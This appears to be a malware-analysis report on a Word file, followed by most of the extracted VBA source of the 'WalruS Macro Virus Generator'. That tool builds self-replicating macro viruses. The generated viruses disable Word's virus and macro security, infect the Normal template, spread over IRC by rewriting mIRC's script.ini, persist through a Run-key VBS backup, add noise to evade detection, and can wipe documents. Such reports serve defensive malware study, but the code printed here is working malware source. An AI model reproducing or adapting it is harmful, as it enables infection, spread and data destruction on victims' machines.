MALICIOUS
Risk Score: 466
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macro virus markers and VBA macros that utilize WScript.Shell and CreateObject, indicating an intent to execute external code. The presence of AutoOpen and Document_Open macros suggests the malicious code runs automatically upon opening the document. The ClamAV detections further confirm its malicious nature, identifying it as a trojan.
Heuristics 12
- Raw OLE macro text shows self-replication or security tampering | critical | OLE_RAW_MACRO_SELF_REPLICATION
  OLE streams contain macro source text with auto-run entry points, CreateObject automation, CodeModule AddFromString/InsertLines/DeleteLines behavior, and Outlook or macro-security tampering. This is high-confidence macro-virus behavior even when oletools does not recover a standard VBA project.
- ClamAV: Doc.Trojan.Fool-3 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Trojan.Fool-3
- VBA macros detected | medium | 6 related findings | OLE_VBA_MACROS
  Document contains VBA macro code
- Potential Shell call in VBA | critical | OLE_VBA_SHELL
  Matched line in script:
    Print #1, "Options.BlueScreen = True"
    Print #1, "MyApp = Shell(""notepad.exe"", 1)"
    Print #1, "SendKeys ""Hello there!~~Im the WalruS. Welcome To My New Creation - Furio~~~///0-0\\\ WalruS 09/00"", True"
- WScript.Shell usage | critical | OLE_VBA_WSCRIPT
  Matched line in script:
    Print #1, "Print #1, ""Dim WSHShell"""
    Print #1, "Print #1, ""Set WSHShell = WScript.CreateObject(""""WScript.Shell"""")"""
    Print #1, "Print #1, ""Set Backup = WScript.CreateObject(""""Word.Application"""")"""
- CreateObject call | high | OLE_VBA_CREATEOBJ
  Matched line in script:
    Print #1, "Print #1, ""Dim WSHShell"""
    Print #1, "Print #1, ""Set WSHShell = WScript.CreateObject(""""WScript.Shell"""")"""
    Print #1, "Print #1, ""Set Backup = WScript.CreateObject(""""Word.Application"""")"""
- AutoOpen macro | low | OLE_VBA_AUTOOPEN
  Matched line in script:
    Print #1, ""
    Print #1, "Sub AutoOpen()"
    Print #1, "'FoolsGold 2000 Virus vWMVG"
- Document_Open macro | low | OLE_VBA_DOCOPEN
  Matched line in script:
    If OptionButton1.Value = True Then
    Print #1, "Private Sub Document_Open()"
    End If
- Auto_Close macro | low | OLE_VBA_AUTOCLOSE
  Matched line in script:
    ' Best Clean The Template Before We Go
    Sub AutoClose()
    On Error Resume Next
- Reference to Windows Script Host | high | SC_STR_WSCRIPT
- Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://www.WalruS.8k.com (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64144 bytes |

SHA-256: 459566e404b7e460e78b46ecd6a8e8e8a9bcbc90bf0f52f611ecd959b1b1ab32
Detection: ClamAV: Win.Trojan.Nihilit-6
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WMVG"
Attribute VB_Base = "0{C302E890-8A54-4E08-87EC-419BB4C1C9FA}{B1A4CB28-6339-451E-BF22-25CE123D8701}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' ************************************
' WalruS Macro Virus Generator (WMVG)
' Version 1.00
' By The WalruS 10/00
' ************************************
' Help Buttons
Private Sub CommandButton1_Click()
MsgBox "The Virus Will Infect When The Document Is Opened", vbInformation, "WMVG"
End Sub
Private Sub CommandButton10_Click()
MsgBox "The Virus Payload Will Be A Simple Message Box", vbInformation, "WMVG"
End Sub
Private Sub CommandButton11_Click()
MsgBox "The Virus Payload Will Be To Give Word Hiccups :-)", vbInformation, "WMVG"
End Sub
Private Sub CommandButton12_Click()
MsgBox "The Virus Payload Will Be To Open & Close The CD Tray Continously", vbInformation, "WMVG"
End Sub
Private Sub CommandButton13_Click()
MsgBox "The Virus Payload Will Change The Windows" & vbCr & "System Colours Until The PC Is Rebooted", vbInformation, "WMVG"
End Sub
Private Sub CommandButton14_Click()
MsgBox "The Virus Payload Will Delete The Document Being Viewed." & vbCr & Application.UserName & " Is An Evil Bastard ;-)", vbInformation, "WMVG"
End Sub
Private Sub CommandButton15_Click()
MsgBox "The Virus Payload Will Be To Make The Office Assistant Say A Message", vbInformation, "WMVG"
End Sub
Private Sub CommandButton17_Click()
OptionButton15.Value = True
WMVG.Hide
WMVGPayloadAssistant.Show
End Sub
Private Sub CommandButton19_Click()
OptionButton10.Value = True
WMVG.Hide
WMVGPayloadMsg.Show
End Sub
Private Sub CommandButton2_Click()
MsgBox "The Virus Will Infect When The Document Is Closed", vbInformation, "WMVG"
End Sub
Private Sub CommandButton32_Click()
MsgBox "The Virus Will Be Able To Spread On IRC As A Worm", vbInformation, "WMVG"
End Sub
Private Sub CommandButton33_Click()
MsgBox "The Virus Wont Be Able To Spread On IRC!", vbInformation, "WMVG"
End Sub
Private Sub CommandButton48_Click()
MsgBox "The Virus Will Be Backed Up On Reboot" & vbCr & "Therefore Making It Harder To Get Rid Off", vbInformation, "WMVG"
End Sub
Private Sub CommandButton49_Click()
MsgBox "The Virus Wont Have VBS Backup!", vbInformation, "WMVG"
End Sub
Private Sub CommandButton5_Click()
MsgBox "The Virus Wont Have Any Stealth", vbInformation, "WMVG"
End Sub
Private Sub CommandButton6_Click()
MsgBox "The Virus Will Have Limited Stealth" & vbCr & "It Will Disable Alt-F11 Key Presses", vbInformation, "WMVG"
End Sub
Private Sub CommandButton62_Click()
MsgBox "The Payload Runs On A Date Set By You", vbInformation, "WMVG"
End Sub
Private Sub CommandButton63_Click()
MsgBox "The Payload Runs At Random", vbInformation, "WMVG"
End Sub
Private Sub CommandButton65_Click()
MsgBox "The Payload Runs Everytime The Documents Infection Hook Is Run", vbInformation, "WMVG"
End Sub
Private Sub CommandButton72_Click()
OptionButton58.Value = True
WMVG.Hide
WMVGPayloadDate.Show
End Sub
Private Sub CommandButton73_Click()
WMVG.Hide
WMVGExit.Show
End Sub
Private Sub CommandButton74_Click()
WMVG.Hide
WMVGAbout.Show
End Sub
Private Sub CommandButton75_Click()
' Extras
WMVG.Hide
WMVGExtras.Show
End Sub
Private Sub CommandButton76_Click()
' Generate
Call GenerateClassVirus
End Sub
Private Sub CommandButton77_Click()
MsgBox "The Virus Copies Its Code Directly Using String Copy", vbInformation, "WMVG"
End Sub
Private Sub CommandButton78_Click()
MsgBox "The Virus Copies Its Code To A File And Infects From There", vbInformation, "WMVG"
End Sub
Private Sub CommandButton79_Click()
OptionButton59.Value = True
WMVG.Hide
WMVGPayloadRandom.Show
End Sub
Private Sub CommandButton80_Click()
MsgBox "Enter Your Own Payload Code", vbInformation, "WMVG"
End Sub
Private Sub CommandButton81_Click()
OptionButton67.Value = True
WMVG.Hide
WMVGPayloadPlugin.Show
End Sub
Private Sub CommandButton82_Click()
MsgBox "The Virus Will Have Random Noise Added To It" & vbCr & "This Will Make The Virus More Unique And Harder To Detect", vbInformation, "WMVG"
End Sub
Private Sub CommandButton83_Click()
MsgBox "The Source Code Will Be Generated In" & vbCr & "C:\My Documents", vbInformation, "WMVG"
End Sub
Private Sub CommandButton9_Click()
MsgBox "The Virus Wont Have A Payload", vbInformation, "WMVG"
End Sub
Private Sub Frame11_Click()
End Sub
Private Sub Frame16_Click()
End Sub
Private Sub Frame17_Click()
End Sub
Private Sub Frame18_Click()
End Sub
Private Sub Frame3_Click()
End Sub
Private Sub Frame7_Click()
End Sub
Private Sub OptionButton12_Click()
End Sub
Private Sub OptionButton15_Click()
End Sub
Private Sub OptionButton2_Click()
End Sub
Private Sub OptionButton3_Click()
End Sub
Private Sub OptionButton28_Click()
End Sub
Private Sub OptionButton29_Click()
End Sub
Private Sub OptionButton44_Click()
End Sub
Private Sub OptionButton58_Click()
End Sub
Private Sub OptionButton59_Click()
End Sub
Private Sub OptionButton64_Click()
End Sub
Private Sub OptionButton7_Click()
End Sub
Private Sub OptionButton60_Click()
End Sub
Private Sub OptionButton66_Click()
End Sub
Private Sub OptionButton9_Click()
End Sub
Private Sub OptionButton77_Click()
MsgBox "The Virus Will Have Visual Basic Script Backup On Reboot", vbInformation, "WMVG"
End Sub
Private Sub OptionButton78_Click()
MsgBox "The Virus Wont Have VBS Backup", vbInformation, "WMVG"
End Sub
Private Sub TextBox1_Change()
End Sub
Private Sub UserForm_Click()
End Sub
Private Sub GenerateClassVirus()
' Generate The Variables
Call WallysVariableNameGenerator(Variable1, Variable2, Variable3, Variable4, Variable5, Variable6)
' Check Infect On For Error
If OptionButton1.Value = OptionButton2.Value Then
MsgBox "Please Select An Infection Method", vbInformation, "Doh!"
GoTo EndSub
End If
' Check Infection Type For Error
If OptionButton65.Value = OptionButton66.Value Then
MsgBox "Please Select The Infection Method", vbInformation, "One Or The Other"
GoTo EndSub
End If
' Make Sure Stealth Is Not Flagged
If OptionButton5.Value Or OptionButton6.Value = True Then
Stealth = "Good"
End If
' Check Stealth For Error
If Stealth = "Error" Then
MsgBox "Please Select The Stealth Level", vbInformation, "Doh!"
GoTo EndSub
End If
' Check Infect IRC For Error
If OptionButton28.Value = OptionButton29.Value Then
MsgBox "Please State If IRC Spreading Is Required", vbInformation, "Wake Up!"
GoTo EndSub
End If
' Check VBS Backup For Error
If OptionButton44.Value = OptionButton45.Value Then
MsgBox "Please State If VBS Backup Is Required", vbInformation, "You A Script Kiddie?"
GoTo EndSub
End If
' Virus Author
VirusAuthor = TextBox1.Text
' Check Virus Author For Error
If TextBox1 = "" Then
MsgBox "Please Enter Virus Authors Name", vbInformation, "Dont Ya Know Yer Name!"
GoTo EndSub
End If
' Virus Name
VirusName = TextBox2.Text
' Check Virus Name For Error
If TextBox2.Text = "" Then
MsgBox "Please Enter The Virus Name", vbInformation, "Christen It Then!"
GoTo EndSub
End If
' Virus Payload
If OptionButton9.Value = True Then
Payload = False
PayloadTrigger = False
OptionButton58.Value = False
OptionButton59.Value = False
OptionButton60.Value = False
End If
If OptionButton10.Value Or OptionButton11.Value Or OptionButton12.Value Or OptionButton13.Value Or OptionButton14.Value Or OptionButton15.Value Or OptionButton67.Value = True Then Payload = True
' Check Payload For Error
If Payload = Error Then
MsgBox "Please Select Whether A Payload Is Required Or Not", vbInformation, "Get With It"
GoTo EndSub
End If
' Payload Trigger
If OptionButton58.Value Or OptionButton59.Value Or OptionButton60.Value = True Then PayloadTrigger = True
' Check Payload Trigger For Error
If Payload = True And PayloadTrigger = False Then
MsgBox "Please Select A Payload Trigger Or Select No Payload", vbInformation, "Make Yer Mind Up"
GoTo EndSub
End If
' Check To Ensure Month Is Entered If Date Has Been Selected
If OptionButton58.Value = True And PayloadMonth = 0 Then
MsgBox "Please Select A Valid Month Or Select Another Trigger", vbInformation, "Idiot"
GoTo EndSub
End If
' Check To Ensure Day Is Entered If Date Has Been Selected
If OptionButton58.Value = True And PayloadDay = 0 Then
MsgBox "Please Select A Valid Day Or Select Another Trigger", vbInformation, "Idiot"
GoTo EndSub
End If
' Check Random No Has Been Entered If Random Has Been Selected
If OptionButton59.Value = True And RandomTrigger = 0 Then
MsgBox "Please Select A Random Number For The Random Payload", vbInformation, "Random Insult Required"
GoTo EndSub
End If
' Check Message Has Been Entered If Message Payload Has Been Selected
If OptionButton10.Value = True And PayloadMsgText = "" Then
MsgBox "Please Enter A Message Or Select A Different Payload", vbInformation, "Message Required"
GoTo EndSub
End If
' Check Message Type Has Been Entered If Message Payload Has Been Selected
If OptionButton10.Value = True And PayloadMsgType = "Error" Then
MsgBox "Please Enter A Message Type Or Select A Different Payload", vbInformation, "Message Required"
GoTo EndSub
End If
' Check That Payload Plug Has Been Entered
If OptionButton67.Value = True And PayloadPlugin = "Error" Then
MsgBox "Please Enter The Code For The Plugin Payload", vbInformation, "Plugin In Code Required"
GoTo EndSub
End If
' Check That Assistants Message Has Been Entered
If OptionButton15.Value = True And PayloadAssistantMessage = "" Then
MsgBox "Please Enter The Assistants Message Or Select A Different Payload", vbInformation, "Paperclips Words Please"
GoTo EndSub
End If
' Check For Virus Of Same Name
Exists = Dir("C:\My Documents\" & VirusName & ".cls")
If Exists <> "" Then
MsgBox VirusName & " Already Exists" & vbCr & "Please Select Another Name Or Delete" & vbCr & "C:\My Documents\" & VirusName, vbExclamation, "WMVG"
GoTo EndSub
End If
' Open source file for construction
Open "C:\My Documents\" & VirusName & ".cls" For Append As #1
' Marker
Print #1, "'" ' & VirusName *** Possible ***
' CD Tray Payload Declare
If Payload = True And OptionButton11.Value = True Then
Print #1, "Private Declare Function mciSendString Lib ""winmm.dll"" Alias ""mciSendStringA"" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long"
End If
' Colours Payload Declare
If Payload = True And OptionButton13.Value = True Then
Print #1, "Private Declare Function SetSysColors Lib ""user32"" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long"
End If
' Infection Hook 1 (Open)
If OptionButton1.Value = True Then
Print #1, "Private Sub Document_Open()"
End If
' Infection Hook 2 (Close)
If OptionButton2.Value = True Then
Print #1, "Private Sub Document_Close()"
End If
Call MacroNoiseEngine ' Noise
' Error Handler
Print #1, "On Error Resume Next"
Print #1, ""
' Virus Details
Print #1, "' Virus Name : " & VirusName
Print #1, "' VirusAuthor : " & VirusAuthor
Print #1, "' Comments : " & TextBox3.Text
Print #1, "' Date : " & Day(Now) & "/" & Month(Now) & "/" & Year(Now)
Print #1, ""
Print #1, "' A Virus Created By The WalruS Macro Virus Generator v1.00 (WMVG)"
Print #1, ""
Call MacroNoiseEngine ' Noise
' Word Options
Print #1, "With Options"
Print #1, " .VirusProtection = 0"
Print #1, " .SaveNormalPrompt = 0"
Print #1, " .ConfirmConversions = 0"
Print #1, "End With"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Application.DisplayStatusBar = False"
Call MacroNoiseEngine ' Noise
Print #1, "ActiveDocument.ReadOnlyRecommended = False"
Call MacroNoiseEngine ' Noise
Print #1, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, " CommandBars(""Macro"").Controls(""Security..."").Enabled = False"
Call MacroNoiseEngine ' Noise
' Stealth Settings
If OptionButton6.Value = True Then
Print #1, "KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:="" """
End If
Call MacroNoiseEngine ' Noise
Print #1, "Set " & Variable1 & " = NormalTemplate.VBProject.VBComponents(1).codemodule"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Set " & Variable2 & " = ActiveDocument.VBProject.VBComponents(1).codemodule"
' Infection Routine No 1 (More To Be Added) Variable1 = nor Variable2 = doc
If OptionButton65.Value = True Then
Print #1, "If " & Variable1 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".DeleteLines 1, " & Variable1 & ".CountOfLines"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".InsertLines 1, " & Variable2 & ".Lines(1, " & Variable2 & ".CountOfLines)"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "ElseIf " & Variable2 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Print #1, Variable2 & ".DeleteLines 1, " & Variable2 & ".CountOfLines"
Call MacroNoiseEngine ' Noise
Print #1, Variable2 & ".InsertLines 1, " & Variable1 & ".Lines(1, " & Variable1 & ".CountOfLines)"
Call MacroNoiseEngine ' Noise
Print #1, "ActiveDocument.Save"
Call MacroNoiseEngine ' Noise
Print #1, "End If"
Call MacroNoiseEngine ' Noise
End If
' Infection Routine No 2 (More To Be Added) Variable1 = nor Variable2 = doc
If OptionButton66.Value = True Then
Print #1, "Open ""C:\Windows\"" & Application.Username & "".sys"" For Output As #1"
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 150)"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Close #1"
Print #1, "If " & Variable1 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".DeleteLines 1, " & Variable1 & ".CountOfLines"
Call MacroNoiseEngine ' Noise
Print #1, Variable1 & ".AddFromFile (""C:\Windows\"" & Application.Username & "".sys"")"
Print #1, "NormalTemplate.Save"
Print #1, "ElseIf " & Variable2 & ".Lines(1, 1) <> ""'"" Then"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, Variable2 & ".DeleteLines 1, " & Variable2 & ".CountOfLines"
Print #1, Variable2 & ".AddFromFile (""C:\Windows\"" & Application.Username & "".sys"")"
Print #1, "ActiveDocument.Save"
Print #1, "End If"
End If
' WallyS Lamer Detector
Print #1, "Set " & Variable3 & " = " & Variable4
' Infect IRC
If OptionButton28.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "If System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\WalruS\WMVG"", ""Installed"") <> ""True"" Then"
Call MacroNoiseEngine ' Noise
Print #1, "exists = Dir(""c:\mirc\mirc32.exe"")"
Print #1, "If exists = """" Then"
Call MacroNoiseEngine ' Noise
Print #1, "Exit Sub"
Print #1, "Else"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "dropped = Dir(""c:\mirc\download\ReadMe.doc"")"
Print #1, "If dropped = """" Then ActiveDocument.SaveAs ""c:\mirc\download\ReadMe.doc"""
Call MacroNoiseEngine ' Noise
Print #1, "Kill ""c:\mirc\script.ini"""
Print #1, "Open ""c:\mirc\script.ini"" For Output As #1"
Print #1, "Print #1, ""[script]"""
Print #1, "Print #1, ""n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\ReadMe.doc }"""
Print #1, "Print #1, ""n1=on 1:CONNECT: {"""
Print #1, "Print #1, ""n2= /join #virus """
Print #1, "Print #1, ""n3= /msg #virus Im Infected With A Virus Created By WMVG"""
Print #1, "Print #1, ""n4= /part #virus"""
Print #1, "Print #1, ""n5= /clear"""
Print #1, "Print #1, ""n6= /motd"""
Print #1, "Print #1, ""n7= }"""
Print #1, "Close #1"
Print #1, "End If"
Call MacroNoiseEngine ' Noise
Print #1, "End If"
End If
' VBS Backup
If OptionButton44.Value = True Then
Print #1, "If System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\WalruS\WMVG"", ""Installed"") <> ""True"" Then"
Call MacroNoiseEngine ' Noise
Print #1, "Open ""C:\Windows\Backup.drv"" For Output As #1"
Print #1, "Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 100)"
Print #1, "Close #1"
Print #1, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"", ""WMVG"") = ""C:\Windows\Backup.vbs"""
Print #1, "Open ""C:\Windows\Backup.vbs"" For Output As #1"
Print #1, "Print #1, ""' Backup.vbs for WMVG by The WalruS"""
Print #1, "Print #1, ""On Error Resume Next"""
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, ""Dim WSHShell"""
Print #1, "Print #1, ""Set WSHShell = WScript.CreateObject(""""WScript.Shell"""")"""
Print #1, "Print #1, ""Set Backup = WScript.CreateObject(""""Word.Application"""")"""
Print #1, "Print #1, ""Backup.Options.VirusProtection = False"""
Print #1, "Print #1, ""Backup.Options.SaveNormalPrompt = False"""
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, ""For x = 1 To Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"""
Print #1, "Print #1, ""Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"""
Print #1, "Print #1, ""Next"""
Print #1, "Print #1, ""Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (""""C:\Windows\Backup.drv"""")"""
Call MacroNoiseEngine ' Noise
Print #1, "Print #1, ""Backup.Application.Quit"""
Print #1, "Close #1"
Print #1, "End If"
End If
' Payload PayloadDay = Every Day
If OptionButton58.Value = True And PayloadDay = 99 Then
Call MacroNoiseEngine ' Noise
Print #1, "If Month(Now) = " & PayloadMonth & " Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload PayloadMonth = Every Month
If OptionButton58.Value = True And PayloadMonth = 99 Then
Call MacroNoiseEngine ' Noise
Print #1, "If Day(Now) = " & PayloadDay & " Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload Trigger 1 (Date)
If OptionButton58.Value = True And EveryVariable = False Then
Call MacroNoiseEngine ' Noise
Print #1, "If Month(Now) = " & PayloadMonth & " And Day(Now) = " & PayloadDay & " Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload Trigger 2 (Random)
If OptionButton59.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Trigger = Int(Rnd * " & RandomTrigger & ")"
Call MacroNoiseEngine ' Noise
Print #1, "If Trigger = 3 Then Call " & Variable6
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
End If
' Payload Trigger 3 (Every Run)
If OptionButton60.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Call " & Variable6
Call MacroNoiseEngine ' Noise
End If
Print #1, "End Sub"
' Payload
If Payload = True Then
Print #1, "Private Sub " & Variable6 & " ()"
Call MacroNoiseEngine ' Noise
Print #1, "On Error Resume Next"
End If
' Payload 1 (Message Box)
If OptionButton10.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "MsgBox """ & PayloadMsgText & """" & ", " & PayloadMsgType & ", " & """" & VirusName & """"
End If
' Payload 2 (CD Tray)
If OptionButton11.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Do"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "mciSendString ""set cd door open"", 0, 0, 0: mciSendString ""set cd door closed"", 0, 0, 0: mciSendString ""set cd time format tmsf wait"", 0, 0, 0: mciSendString ""open cdaudio alias cd wait shareable"", 0, 0, 0"
Call MacroNoiseEngine ' Noise
Print #1, "Loop"
End If
' Payload 3 (Colours)
If OptionButton13.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "a = SetSysColors(1, 1, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 2, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 3, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 4, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 5, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 6, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 7, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 8, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 9, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 10, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 11, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 12, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 13, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 14, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 15, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 16, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 17, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 18, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 19, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 20, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 21, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 22, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 23, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 24, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 25, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 26, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Print #1, "a = SetSysColors(1, 27, RGB(Rnd * 255, Rnd * 255, Rnd * 255))"
Call MacroNoiseEngine ' Noise
End If
' Payload 4 (Hiccups)
If OptionButton12.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Do"
Print #1, "DoEvents"
Call MacroNoiseEngine ' Noise
Print #1, "Randomize"
Call MacroNoiseEngine ' Noise
Print #1, "If Int(Rnd * 10000) = 2 Then"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "Word.ActiveDocument.ActiveWindow.WindowState = wdWindowStateMinimize"
Call MacroNoiseEngine ' Noise
Print #1, "Word.ActiveDocument.ActiveWindow.WindowState = wdWindowStateMaximize"
Call MacroNoiseEngine ' Noise
Print #1, "End If"
Print #1, "Loop"
End If
' Payload 5 (KillDoc)
If OptionButton14.Value = True Then
Call MacroNoiseEngine ' Noise
Print #1, "Selection.WholeStory"
Call MacroNoiseEngine ' Noise
Print #1, "Selection.Delete Unit:=wdCharacter, Count:=1"
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, "ActiveDocument.Save"
End If
' Payload 6 (Assistant)
If OptionButton15.Value = True Then
Print #1, "Assistant.Visible = True"
Call MacroNoiseEngine ' Noise
Print #1, "With Assistant.NewBalloon"
Print #1, ".Icon = msoIconAlert"
Call MacroNoiseEngine ' Noise
Print #1, ".Text = """ & PayloadAssistantMessage & """"
Print #1, ".Heading = """ & VirusName & """"
Call MacroNoiseEngine ' Noise
Print #1, ".Show"
Print #1, "End With"
End If
' Payload 7 (Plugin)
If OptionButton67.Value = True Then
Call MacroNoiseEngine ' Noise
Call MacroNoiseEngine ' Noise
Print #1, PayloadPlugin
Call MacroNoiseEngine ' Noise
End If
' Payload
If Payload = True Then
Print #1, "End Sub"
End If
Close #1
' Open document and then infect it, save it and close it
Documents.Add Template:=NormalTemplate.FullName, NewTemplate:=False
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromFile ("C:\My Documents\" & VirusName & ".cls")
ActiveDocument.SaveAs ("C:\My Documents\" & VirusName & ".doc")
ActiveDocument.Close
' Keep the source code?
If CheckBox1.Value = False Then
Kill "C:\My Documents\" & VirusName & ".cls"
End If
' Clean the normal template incase virus infected it
Clean = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Clean > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Clean
NormalTemplate.Save
' Hide this form
WMVG.Hide
' Tell the user that the vxs is made
MsgBox VirusName & " Has Been Created In C:\My Documents", vbInformation, "Heya " & Application.UserName & "..."
' Show Virus Created Form
WMVGVirusCreated.Show
EndSub:
End Sub
' My Variable Name Generator
Private Sub WallysVariableNameGenerator(Variable1, Variable2, Variable3, Variable4, Variable5, Variable6)
Randomize
Variable1 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable2 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable3 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable4 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable5 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
Variable6 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 9999)
End Sub
